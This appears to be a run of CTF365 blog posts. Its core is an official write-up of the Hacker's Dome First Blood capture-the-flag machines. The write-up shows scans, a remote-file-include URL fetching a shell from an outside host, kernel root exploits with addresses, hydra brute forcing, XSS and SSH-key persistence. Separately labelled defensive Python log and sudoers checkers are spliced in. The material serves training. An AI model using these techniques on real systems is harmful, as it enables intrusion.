Channel: CTF365 Blog

Hacker’s Dome – First Blood | The Machines


First of all, I would like to thank you all for the great support you showed us during the competition. This motivates us to develop Hacker’s Dome even further. We learned a lot during this first edition but, most importantly, we learned how we can make things better for all of our players.

You asked for official information, so here it is. We’re starting with the pristine images that were part of First Blood.

Here are the credentials for accessing them after you set them up on your own hypervisor:

  • ctf01-01 root password:
    jM^Dp7>+3Z}LJ_fX3d0Yh?vZ0(4[i*p8
  • ctf01-02 xubuntu password:
    ca-4u$j*wd5?LcKqAM5"(Y5tbYZ9[jEN

Both of them are SSH enabled. The images were created using VirtualBox, but they should work under most hypervisors out there. For some hypervisors, you may need to convert the images to an appropriate image format.

Please notice that the ctf01-02 machine was watered down during the competition due to some technical issues that we discovered. The short version of the story: the exploit that was needed for getting a foothold on this machine proved to be problematic over the VPN connection, even though I could successfully run the exploit by using my own network. Since this is the original image, some of our contestants’ write-ups do not apply. You can take a stab at owning this piece until we do the official write-ups.

Download links:

ctf01-01
ctf01-02


Introducing Student Security Training Program


This article is for information security and network security teachers, students who want to become security professionals or system administrators, and university representatives whose university offers information security or network security courses.

Cyber security has become a global affair, reaching nations in every corner of the world. As a result, the entire world must make preparations at the earliest stage possible. 

According to the 2013 (ISC)² Global Information Security Workforce Study by Frost & Sullivan, there will be 4 million security professionals by the end of 2015, and 4.9 million by the end of 2017. So, what does this mean? Well, it means that significant improvements must be made in the training arena to effectively prepare the next generation of security professionals.

To support the growing demand for improved InfoSec training and preparation, CS faculties are positioning themselves on the frontline. This frontline approach is demonstrated through university-hosted and government-hosted CTF (capture the flag) competitions, as shown in the following examples:

CSAW 2014

HSCTF

CyberPatriot

The Honeynet Project

To support early training for the InfoSec industry, CTF365 offers a free account that gives users unrestricted access to vulnerable-by-design servers and web applications. Free account users can currently train on Metasploitable and bWAPP but, in the future, CTF365 plans to implement additional virtual machines and expand its cloud-based vulnerable-by-design lineup.

As free account users grow their skills, they can transition to a CTF365 paid account. Paid account users are given access to the CTF365 main arena, which currently hosts more than 80 fortresses (servers) and 200 web applications. Unlike other penetration testing labs, the fortresses found in the CTF365 main arena are created, maintained, and defended by other users. This creates a unique opportunity for users to practice both offensive and defensive security strategies without the downsides that are associated with intentionally vulnerable designs. 

At CTF365, we understand the economic hardships that go along with being a college student. We also understand that eating Top Ramen for an entire semester can take a toll on you. That’s why we created the Student CTF365 plans, low cost security training programs for students. Students can choose from the following three tiers:  

Student Access $15:

  • Access to the CTF365 main arena

Student Plus+ $22:

  • Access to the CTF365 main arena
  • Access to the Hacker’s Dome CTF weekend competitions

Student Pro $29 (coming soon):

  • Access to the CTF365 main arena
  • Access to the Hacker’s Dome CTF weekend competitions
  • 1 fortress (virtual server in the main arena)
  • 5 custom CTF365 domains (.ctf and .365)

Who qualifies for the Student CTF365 Plans?

To confirm student status, users must use an email address with a .edu domain during registration. Additionally, users must reply to our confirmation email to confirm and activate their account.

 


If you’re a student who would like to benefit from our Student Security Training Program but your university doesn’t own a .EDU domain, please send an email to support@ctf365.com and include the following details: 

Subject: “Student Security Training Program – New University Domain”

Body: Your full name, the name of your school, and the domain name to be added for our Student Security Training Program.

Why join?

As Joseph Greenwood stated during his 2014 BSides London presentation:

“Hands-on learning is epic”

 

CTF365 is a top-notch security training platform with a focus on security professionals, system administrators and web developers, offering five-star services for training, learning and improving offensive and defensive web security.

Any questions? Glad to answer.


Hacker’s Dome – First Blood | The Official Writeup


I’ll try to keep this information to a minimum for better readability. The setup was replicated over a local network for faster access.

ctf01-01, IP address: 10.200.0.4

Enumeration:

nmap -sS -p 1-65535 10.200.0.4

Starting Nmap 6.45 ( http://nmap.org ) at 2014-05-23 13:06 EEST
Nmap scan report for 10.200.0.4
Host is up (0.00013s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:89:35:6E (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 6.67 seconds

nmap -sU 10.200.0.4

Starting Nmap 6.45 ( http://nmap.org ) at 2014-05-23 13:06 EEST
Nmap scan report for 10.200.0.4
Host is up (0.00044s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:89:35:6E (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 1092.14 seconds

The web server running on 80/tcp doesn’t give up any information from the index, but a web scanner doesn’t hurt.

nikto -host 10.200.0.4 -C all
- Nikto v2.1.6
—————————————————————————
+ Target IP: 10.200.0.4
+ Target Hostname: 10.200.0.4
+ Target Port: 80
+ Start Time: 2014-05-23 13:08:41 (GMT3)
—————————————————————————
+ Server: Apache/2.2.3 (CentOS)
+ Server leaks inodes via ETags, header found with file /, inode: 2130490, size: 179, mtime: Wed Mar 3 04:53:52 2027
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Cookie openscrutin created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.1.6
+ OSVDB-3092: /development/: This might be interesting…
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake’s list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 22353 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2014-05-23 13:09:45 (GMT3) (64 seconds)
—————————————————————————
+ 1 host(s) tested

There are a couple of interesting items: the /info.php script and the /development/ directory.

The info.php script simply runs the phpinfo() function. Leaving a script like this on a production server just to read that information is a fairly common mistake made by PHP developers. Unfortunately, “baddies” may also discover these poorly thought-out decisions.

The juicy bits from phpinfo() are:

PHP 5.1.6 and allow_url_fopen = On

allow_url_fopen is enabled by default in PHP and, prior to PHP 5.2.0, it also allows include and require to load PHP code from a remote URL. PHP 5.2.0 added allow_url_include, which is disabled by default to mitigate remote file inclusion attacks.

register_globals = On

This is a common “misconfiguration” favoured by developers who are too lazy to read their input out of the superglobals, such as $_GET and $_POST: when register_globals is turned on, $_GET['foo'] is also registered as the global variable $foo, so any request can initialize any variable the script did not set itself. Combine this “misconfiguration” with allow_url_fopen and sloppy code full of include statements that use uninitialized variables, and the result is a guaranteed recipe for disaster.

The application from /development/ is the perfect example of the recipe mentioned above: Openscrutin 1.03 (RFI/LFI) Multiple File Include Vulnerability.

The first RFI example is http://shell4u.tk/[path]/obj/droit.class.php?path_om=[Shell]

Putting that into practice:

(screenshot: ctf01-01-pwn)

I’d like to point out that the machine is running a 32-bit build. As pointed out by some of our contestants, some of you attempted to hit it with 64-bit local root exploits. That’s a big no-no. uname -a on the target machine and gcc’s -m32 flag on your machine are your friends.

The 2.6.18-8.el5 kernel is vulnerable to the venerable Sendpage Local Privilege Escalation, also known as CVE-2009-2692. I used this exploit because, in my experience, it works well on most targets.

gcc -m32 9545.c -o sock_sendpage
file sock_sendpage
sock_sendpage: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0xa7e09b5a2c75ae82884ab06a9f378491eb6221a7, not stripped

ctf01-02 – the First Blood edition, IP address: 10.200.0.6

As previously mentioned, this machine was watered down due to technical issues. Although it took us longer to deploy, you got two machines as we promised.

I’ll start with the “easy way in”. I added a user that is also used for HTTP Basic Authentication on this machine, simulating a common mistake: credential reuse.

root@ctf01-02:~# adduser admin
Adding user `admin' ...
Adding new group `admin' (1001) ...
Adding new user `admin' (1001) with group `admin' ...
Creating home directory `/home/admin' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for admin
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n]
root@ctf01-02:~#

This part also includes a hidden flaw caused by a default Ubuntu policy which some people are unaware of: if you add a user named admin, adduser also creates a group named admin (as the dialogue above shows), and sudo allows members of that group to run anything as root, even though nothing in the dialogue suggests it.

The issue is the default sudoers policy:

root@ctf01-02:~# cat /etc/sudoers | grep ALL
root ALL=(ALL:ALL) ALL
%admin ALL=(ALL) ALL
%sudo ALL=(ALL:ALL) ALL

This shows that there are two “supergroups” there: sudo and admin. However, before running the adduser command, there wasn’t any admin group; only the sudo group existed.
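A check for this trap, as an added example that is not part of the write-up: it parses a sudoers file and an /etc/group listing (both constructed here to mirror the Ubuntu defaults shown above, before adduser was run) and reports every %group rule whose group does not exist yet, since adduser creates such a group the moment someone adds a user of that name.

```python
"""Find sudoers group grants for groups that do not exist (yet): the %admin trap.

Added example, not from the write-up. SUDOERS and ETC_GROUP are constructed to
mirror the Ubuntu defaults shown above, before `adduser admin` was run."""
import re

SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
"""

ETC_GROUP = """\
root:x:0:
sudo:x:27:xubuntu
xubuntu:x:1000:
"""

# %group  host=(runas) [NOPASSWD:] commands   is the only sudoers form parsed here;
# aliases, #include/#includedir and sudoers.d are out of scope for this check.
GROUP_RULE = re.compile(r"^%(?P<group>\S+)\s+\S+=\([^)]*\)\s+(?:NOPASSWD:\s*)?(?P<cmds>.+)$")

def group_grants(sudoers_text):
    """Map each %group in sudoers to the command spec it may run."""
    grants = {}
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()     # drop comments (see note above)
        m = GROUP_RULE.match(line)
        if m:
            grants[m["group"]] = m["cmds"].strip()
    return grants

def existing_groups(group_text):
    """Group names present in an /etc/group listing."""
    return {line.split(":", 1)[0] for line in group_text.splitlines() if line.strip()}

def dangling_grants(sudoers_text, group_text):
    """Granted groups that are absent from /etc/group.

    adduser creates a group named after every new user, so `adduser admin`
    silently turns a dangling %admin grant into full root access for that user.
    Remove the rule or pre-create the group with a controlled membership."""
    present = existing_groups(group_text)
    return {g: c for g, c in group_grants(sudoers_text).items() if g not in present}

if __name__ == "__main__":
    for group, cmds in dangling_grants(SUDOERS, ETC_GROUP).items():
        print(f"WARNING: %{group} may run '{cmds}' but group '{group}' does not exist")
```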

Enumeration:

nmap -sS -p 1-65535 10.200.0.6

Starting Nmap 6.45 ( http://nmap.org ) at 2014-05-23 14:31 EEST
Nmap scan report for 10.200.0.6
Host is up (0.00021s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:4B:D2:34 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 7.32 seconds

nmap -sU 10.200.0.6

Starting Nmap 6.45 ( http://nmap.org ) at 2014-05-23 14:31 EEST
Nmap scan report for 10.200.0.6
Host is up (0.00065s latency).
Not shown: 949 closed ports, 50 open|filtered ports
PORT STATE SERVICE
5353/udp open zeroconf
MAC Address: 08:00:27:4B:D2:34 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 1022.47 seconds

However, port 80/tcp is behind HTTP Basic Authentication:

curl -I 10.200.0.6
HTTP/1.1 401 Authorization Required
Date: Fri, 23 May 2014 11:32:27 GMT
Server: Apache/2.2.22 (Ubuntu)
WWW-Authenticate: Basic realm="Private party; admin area"
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1

The WWW-Authenticate: Basic realm header hints at a good guess for the username. Anyway, “admin” is definitely a Top 20 username, hence an easy guess with a basic brute force attack.

cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/unix-os/
ls
unix_passwords.txt unix_users.txt
hydra -L unix_users.txt -P unix_passwords.txt http://10.200.0.6/
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak – for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-23 14:43:24
[WARNING] The service http has been replaced with http-head and http-get, using by default GET method. Same for https.
[DATA] 16 tasks, 1 server, 108000 login tries (l:108/p:1000), ~6750 tries per task
[DATA] attacking service http-get on port 80
[80][www] host: 10.200.0.6 login: admin password: qwerty

The brute force succeeds fairly quickly. Since SSH is open, it’s worth trying the same credentials:

(screenshot: ctf01-02-fb-pwn)
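From the defender’s side, the two techniques used so far (the remote file inclusion through Openscrutin’s path_om parameter on ctf01-01 and the HTTP Basic Auth brute force with hydra on ctf01-02) both leave a clear trace in Apache’s access log. The following is an added example, not code from the write-up, that triages such log lines: it flags any query parameter whose value is a URL (the RFI pattern, which also catches nikto’s /info.php?file= probe) and any client that produces a burst of 401 responses. All log lines, IP addresses and thresholds are constructed.

```python
"""Triage Apache access-log lines for the two patterns exercised in this write-up.
Added example, not the write-up's code; all log lines and IPs below are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" format: ip ident user [ts] "method target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# A parameter value starting with one of these is a remote include candidate
# (allow_url_fopen + register_globals turns it into code execution, as above).
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "php://", "data:")

def parse_line(line):
    """Return a dict with ip, user, ts (datetime), method, target, status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec

def rfi_params(target):
    """Names of query parameters whose decoded value points at a remote resource."""
    query = urlsplit(target).query
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if unquote(value).lower().startswith(REMOTE_SCHEMES)]

def find_rfi(lines):
    """(ip, path, parameter) for every request that carries a URL in a parameter."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for param in rfi_params(rec["target"]):
            hits.append((rec["ip"], urlsplit(rec["target"]).path, param))
    return hits

def find_auth_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Map ip -> peak number of 401s inside any sliding `window`, for IPs above `threshold`."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 401:
            per_ip[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        peak, start = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # slide the window's left edge
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[ip] = peak
    return flagged

# Constructed sample: an RFI probe against the Openscrutin include, a nikto-style
# phpinfo/RFI check, a benign request, then a hydra-style run of 401s.
SAMPLE_LOG = [
    '10.200.0.9 - - [23/May/2014:13:12:01 +0300] "GET /development/obj/droit.class.php'
    '?path_om=http%3A%2F%2F203.0.113.5%2Fshell.txt%3F HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.200.0.9 - - [23/May/2014:13:12:02 +0300] "GET /info.php?file=http://203.0.113.5/'
    'rfiinc.txt? HTTP/1.1" 200 40123 "-" "Mozilla/5.0 (Nikto)"',
    '10.200.0.7 - - [23/May/2014:13:15:10 +0300] "GET /development/index.php?page=home '
    'HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
] + [
    f'10.200.0.9 - admin [23/May/2014:14:43:{s:02d} +0300] "GET / HTTP/1.0" 401 503 "-" "Mozilla/4.0 (Hydra)"'
    for s in range(0, 24, 2)
] + [
    '10.200.0.7 - - [23/May/2014:14:44:00 +0300] "GET / HTTP/1.1" 200 179 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, param in find_rfi(SAMPLE_LOG):
        print(f"RFI attempt from {ip}: {path} parameter {param!r}")
    for ip, n in find_auth_bruteforce(SAMPLE_LOG).items():
        print(f"Basic-auth brute force from {ip}: {n} x 401 within 60 s")
```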

ctf01-02 – the original edition, IP address: 10.200.0.6

This is the write-up for the original machine that didn’t take part in the competition. This is what you get in the pristine image that was made available for download. The intention was to make this the “intermediate” level image, but it happened to be the easy one.

I discovered that I couldn’t replicate the attack by using an isolated network without Internet access. If the client-side exploit fails, try to provide Internet access to the machine. We tried to provide Internet access to the machine on the Hacker’s Dome network, but I was still unable to get a reliable exploit.

At this point, I skipped to the point where the HTTP Basic Authentication is bypassed with admin/qwerty. There’s a web application running there which states: “Hi people. Post a message while I’m AFK. Say what you need. I’ll check periodically to see if there’s something new.”

It proves to be vulnerable to XSS:

(screenshot: ctf01-02-orig-xss)

The next step is to verify whether another client is accessing this resource. So, while monitoring Apache’s access log, I injected an iframe <iframe src="http://10.0.0.4/">:

(screenshot: ctf01-02-orig-iframe)

So there’s some information about the user agent of the admin who checks his messages: Firefox/17.0. By doing a little research, this page shows up: Firefox 17.0.1 Flash Privileged Code Injection.

Putting that into practice:

(screenshot: ctf01-02-orig-firefox-pwn)

The connection is unstable since the remote user agent is restarted often, therefore access needs to be secured quickly. Since the SSH port is open and a daemon is running there, the fastest option is to add your SSH public key to ~/.ssh/authorized_keys.

pwd
/home/xubuntu
mkdir .ssh
echo "ssh-rsa [the rest of the public key]" > .ssh/authorized_keys
cat .ssh/authorized_keys
ssh-rsa [the rest of the public key]
chmod 600 .ssh/authorized_keys

The installed kernel proves to be vulnerable to the quite fresh CVE-2014-0038. This public exploit turns out to be the fastest option, even though it requires editing some addresses to make it work under this kernel.

The addresses for Ubuntu 12.04 running 3.8.0-29-generic are:

PTMX_FOPS 0xffffffff81f16f20LL
TTY_RELEASE 0xffffffff81420c30LL
COMMIT_CREDS 0xffffffff81086780LL
PREPARE_KERNEL_CRED 0xffffffff81086a00LL

timeoutpwn.c needs to be updated with these addresses and uploaded to the victim machine, since gcc is installed there.

(screenshot: ctf01-02-orig-exploit)

Then, there’s a clear path to root:

(screenshot: ctf01-02-orig-pwn)

Hacker’s Dome – First Blood | The Winners


First, we’d like to say thanks to all of our Hacker’s Dome – First Blood CTF participants and supporters for making this such an awesome experience. Now, we’re glad to announce the top 3 contestants.

The winners are as follows:

1st Place – Warriar – Germany with 3496 points

2nd Place – BrokenByte – Italy with 8853 points

3rd Place – yF – Germany with 12105 points

The points are a function of time: t1 * w1 + t2 * w2. The lowest score wins.

  • t1 = number of seconds needed for sending the ctf01-01 superuser flag
  • w1 = the weight coefficient for t1, in this case 0.4 as the machine had a higher difficulty than ctf01-02
  • t2 = number of seconds needed for sending the ctf01-02 superuser flag
  • w2 = the weight coefficient for t2, in this case 0.6

The full score board for all successful submissions: 

 

CTF365 User   | ctf01-01 superuser flag | ctf01-01 user flag  | ctf01-02 superuser flag | ctf01-02 user flag  | Points
------------- | ----------------------- | ------------------- | ----------------------- | ------------------- | -------
Warriar       | 2014-05-17 19:40:42     | 2014-05-17 19:50:27 | 2014-05-17 20:53:00     | 2014-05-17 20:51:21 | 3496.8
BrokenByte    | 2014-05-17 20:25:26     | 2014-05-17 19:42:23 | 2014-05-17 22:51:59     | 2014-05-17 22:39:47 | 8853.8
yF            | 2014-05-17 21:34:05     | 2014-05-17 19:52:45 | 2014-05-17 23:36:32     | 2014-05-17 23:31:36 | 12105.2
cet           | 2014-05-18 01:03:24     | 2014-05-17 20:12:26 | 2014-05-18 01:54:18     | 2014-05-18 01:52:04 | 22088.4
z3n           | 2014-05-18 01:42:57     | 2014-05-17 23:43:17 | 2014-05-18 03:03:35     | 2014-05-18 03:00:06 | 25531.8
vavkamil      | 2014-05-18 00:37:14     | 2014-05-17 23:48:43 | 2014-05-18 04:06:33     | 2014-05-18 04:05:23 | 26221.4
rbottier      | 2014-05-18 06:59:01     | 2014-05-18 06:57:12 | 2014-05-18 08:12:25     | 2014-05-18 08:40:35 | 44235.4
5cegliau      | 2014-05-17 20:57:53     | 2014-05-17 20:22:58 | 2014-05-18 15:01:38     | 2014-05-18 14:57:25 | 44540
xcrowtrobotx  | 2014-05-18 16:40:02     | 2014-05-18 06:14:59 | 2014-05-18 05:27:05     | 2014-05-18 05:18:01 | 52227.8
_JogiT4_      | 2014-05-18 04:33:55     | X                   | 2014-05-18 18:02:05     | X                   | 61981
mackwage      | 2014-05-18 01:25:23     | 2014-05-17 21:39:31 | X                       | X                   | DNF
jahawkins     | X                       | X                   | 2014-05-18 16:56:57     | 2014-05-18 16:57:22 | DNF
cochese86     | X                       | 2014-05-18 01:37:41 | X                       | 2014-05-18 02:33:45 | DNF
g8rbait       | X                       | 2014-05-18 01:49:12 | X                       | X                   | DNF
Xomen         | 2014-05-17 23:29:07     | 2014-05-18 00:39:16 | X                       | X                   | DNF
yxchia        | X                       | X                   | 2014-05-17 23:47:10     | 2014-05-17 23:47:55 | DNF
Da5h          | X                       | X                   | 2014-05-17 22:26:59     | 2014-05-17 21:07:19 | DNF
NS21          | X                       | X                   | 2014-05-18 15:50:01     | 2014-05-18 15:28:16 | DNF
Marc          | X                       | X                   | 2014-05-18 06:46:07     | 2014-05-18 06:44:53 | DNF
FatClimber    | X                       | X                   | 2014-05-18 00:39:11     | 2014-05-18 00:35:50 | DNF
nobody        | X                       | 2014-05-18 14:41:52 | X                       | 2014-05-17 21:11:36 | DNF
voytek        | X                       | X                   | 2014-05-17 22:54:18     | 2014-05-17 21:59:39 | DNF
bodad         | X                       | 2014-05-18 01:52:58 | X                       | X                   | DNF
zealias       | X                       | X                   | X                       | 2014-05-18 09:45:22 | DNF
pentesterasia | X                       | X                   | 2014-05-18 15:52:14     | X                   | DNF
sxinjection   | X                       | X                   | X                       | 2014-05-18 10:24:48 | DNF
purpette      | X                       | 2014-05-17 18:43:15 | X                       | X                   | DNF

DNF = Did Not Finish

The reference timestamps for the start of the competitions are: 2014-05-17 18:09:00 for ctf01-01 and 2014-05-17 20:17:00 for ctf01-02. All of the timestamps are expressed in UTC+2.
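The scoring formula applied to the table’s timestamps, as an added example rather than code from the post: it takes the superuser flag times and the two reference start times above, computes t1 * w1 + t2 * w2, and ranks finishers lowest first, marking anyone without both superuser flags as DNF. The rows are a subset copied from the scoreboard.

```python
"""Recompute Hacker's Dome First Blood points from flag submission times.
Added example, not code from the post; rows are copied from the scoreboard above."""
from datetime import datetime

TS_FMT = "%Y-%m-%d %H:%M:%S"
# Reference start per machine (UTC+2, as stated in the post)
START = {"ctf01-01": "2014-05-17 18:09:00", "ctf01-02": "2014-05-17 20:17:00"}
# Weight per machine: ctf01-01 counted as harder, so its seconds weigh less
WEIGHT = {"ctf01-01": 0.4, "ctf01-02": 0.6}

def seconds_since_start(machine, flag_time):
    """t for one machine: seconds from its start until the superuser flag was sent."""
    delta = datetime.strptime(flag_time, TS_FMT) - datetime.strptime(START[machine], TS_FMT)
    return int(delta.total_seconds())

def points(su_flag_01, su_flag_02):
    """t1*w1 + t2*w2 rounded to 0.1, or None (DNF) when a superuser flag is missing."""
    if "X" in (su_flag_01, su_flag_02):
        return None
    t1 = seconds_since_start("ctf01-01", su_flag_01)
    t2 = seconds_since_start("ctf01-02", su_flag_02)
    return round(t1 * WEIGHT["ctf01-01"] + t2 * WEIGHT["ctf01-02"], 1)

# (user, ctf01-01 superuser flag, ctf01-02 superuser flag); "X" = not submitted
SUBMISSIONS = [
    ("Warriar",    "2014-05-17 19:40:42", "2014-05-17 20:53:00"),
    ("BrokenByte", "2014-05-17 20:25:26", "2014-05-17 22:51:59"),
    ("yF",         "2014-05-17 21:34:05", "2014-05-17 23:36:32"),
    ("_JogiT4_",   "2014-05-18 04:33:55", "2014-05-18 18:02:05"),
    ("mackwage",   "2014-05-18 01:25:23", "X"),
]

def ranking(rows=SUBMISSIONS):
    """Finishers ordered by points (lowest wins), followed by the DNFs."""
    scored = [(user, points(a, b)) for user, a, b in rows]
    finishers = sorted((r for r in scored if r[1] is not None), key=lambda r: r[1])
    return finishers + [(user, "DNF") for user, p in scored if p is None]

if __name__ == "__main__":
    for place, (user, p) in enumerate(ranking(), 1):
        print(f"{place}. {user}: {p}")
```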

 

The Official Write-up

The Machines

At this moment we are working on our next CTF competition, which will be free to all of our Bronze Account and Student Plus+ users. Starting date to be announced soon.


Any questions? Glad to answer.


Hacker’s Dome | The Raffle


As you already know, the Hacker’s Dome – First Blood CTF competition had an awesome raffle where the King Prize was a Full Year Metasploit Pro License, followed by 4 Raspberry Pi and 20 Hat + T-shirt sets. Here are the winners of First Blood – The Raffle:

 

(image: Admission Tickets)

Below is the recorded Hacker’s Dome First Blood raffle draw.

 


Please check your Avangate reference code and, if you’re one of the lucky ones, send us an email to support@ctf365.com with Subject Line: Raffle Prize prize_name (e.g. Raspberry Pi). The body text must contain your Avangate reference number (e.g. 2xxxxxxx) and we’ll give you all the details on how to get the prize.

 

Stay secure while having fun. :-)

 

Hacker’s Dome – Double Kill | FREE Access


CTF competitions are the perfect excuse to get together and hack at will. They’re also an entertaining and hands-on way to learn security.

As you all know, we created Hacker’s Dome as a place for CTF365 users to play weekend CTFs with great prizes. In order to get access to Hacker’s Dome, the first thing you need is a registered and confirmed CTF365 account.

First Blood was awesome and now it’s time to move on to the next one, as we promised. This time it will be different: team based, FREE to all CTF365 registered (and confirmed) users, more flags and, for sure, more fun.

Hacker’s Dome – Double Kill

 

Difficulty Grade: Beginner/Intermediate

Format: Team Based

Starting Date: July 26 2014 15:00 UTC

Ending Date: July 27 2014 15:00 UTC

Rules: Yet to come :-)

 

The Prizes:

First Place:

One year CTF365 Premium Access (because you love to train your skills)

Second Place:

6 Months CTF365 Premium Access (because you love to train your skills)

Third Place Package:

3 Months CTF365 Premium Access (because you love to train your skills)

More surprise prizes yet to come. 

Prepare your PenTest tools, tell your friends, challenge your enemies and get ready for the competition.

 


Any questions? Glad to answer. Stay secure while having fun.




How to set up VPN on Android


This guide will teach you how to connect to the CTF365 VPN from your Android smartphone or tablet. If you don’t already have a CTF365 account, you can create one for free here.

IMPORTANT – Your Android device must be rooted to complete this tutorial. If you don’t know how to root your device, there are lots of guides on the Internet that will show you. Just Google something like:

“How to root a (your phone make/model) (your carrier)”

Alright, let’s go ahead and get started. First, we need to log into our CTF365 account and download our VPN configuration files.

Step 1

Log into your CTF365 account

Step 2

Click on your username and select “VPN” from the drop-down menu

Step 3

In the VPN pop-up menu, click each of the three download links to download your VPN files

(screenshot: VPN pop-up window)

NOTE: You should now have the following three files:

(screenshot: VPN files)

Step 4

Create a folder titled “ctf365” and place all three of your VPN files inside it

Step 5

Extract the cert.tgz file

NOTE: You should now have a folder titled “cert” that contains the following four certificates:

(screenshot: VPN certificates)

Step 6

Open the cert folder and move the four certificates into the ctf365 folder

NOTE: You can delete the cert.tgz file and the empty cert folder now

Step 7

Move the ctf365 folder into the home directory on your Android device

Step 8

Download and install OpenVPN for Android from the Google Play Store

OpenVPN for Android

Step 9

Launch the OpenVPN for Android app

Step 10

Click the import button

Step 11

Navigate to the ctf365 folder, choose the client.conf file, and click “Select”

Step 12

To complete the import, click the save button

NOTE: You should now have a VPN profile titled “client”

Step 13

Refer to your client VPN profile and click the settings button

Step 14

Select the “Advanced” menu

Step 15

Untick the box beside “Enable Custom Options”

NOTE: If you leave this option enabled, you will not be able to connect to the CTF365 VPN

Step 16

Navigate back to the main menu and click the “client” VPN profile

Step 17

In the prompt, tick the box beside “I trust this application” and click “OK”

(screenshot: confirmation dialog)

 

NOTE: The OpenVPN log window will appear as the connection attempt begins

Step 18

Refer to the log and look for the “Connected:SUCCESS, …” statement. If you see this statement, you have successfully connected to the CTF365 VPN.

(screenshot: OpenVPN log)

 

Conclusion

Now that you’re connected to the CTF365 VPN from your Android device, you can experience CTF365 like never before. Go ahead, explore! Access Metasploitable, DVWA, and bWAPP in the cloud. If you’re a bronze account holder and you have a fortress (server) in the CTF365 main arena, use an app like ConnectBot or Terminal Emulator to log into your fortress. Scan the arena with Nmap, brute force a target with Hydra, or do some Metasploit magic! Whatever you do, enjoy your newfound freedom!

Ruby on Rails Internship


“Do you want to sell sugar water for the rest of your life, or do you want to come with me and change the world?”

Steve Jobs to Pepsi executive John Sculley

It looks like we are growing faster than anticipated, which is a good thing for two reasons: for us as a startup project, and for some of you as a great opportunity if you are a student who wants to work and gain experience in the information security niche. For that reason we declare:


Internship Opportunity Announcement:

 

Where: CTF365 Platform

How long: Summer/Fall

Position Title: Web Developer Intern

 

DUTIES/JOB DESCRIPTION:

The Intern will work closely with our web developer leader who will be his/her mentor.

HOURS:

Flexible. Since this is remote work, the biggest advantage is that you can manage your own time.

REQUIREMENTS:

Passion:

If there is no passion, then you can skip this intern position. Passion for coding and a thirst for learning new things is a MUST.

Operating System:

Whatever suits you.

Coding:

Ruby on Rails, Git and HAML are required. Anything beyond these will be much appreciated.

 

Though this is not a paid position, there is plenty in it for both you and us.

What’s In It For You As An Intern:

  • Improving your coding skills
  • Prospective career path
  • Opportunity to become part of CTF365 A-team
  • Full Access to the best Security Training Platform out there
  • Best team mates ever – We’re an international team, working remotely, driven by our passion for the project.
  • Best recommendation ever.
  • Learning defensive security – Learning how real security professionals will attack your setups will make you improve your defensive security.

 

HOW TO APPLY:

Candidates can submit an email to support [at] ctf365 [dot] com with Subject Line: Web Developer Intern, telling us what you’re good at, giving us some links if you have some projects you’ve been working on (show off — we love that).

Stay secure while having fun. :-)


Microsoft Products Are Here


When we started to build our security training platform, one of our core objectives was to make the platform flexible. We wanted to provide our users with the flexibility and convenience of connecting their own fortresses (servers) regardless of their location, operating system, cloud solution, private machine, and pentest lab setup.

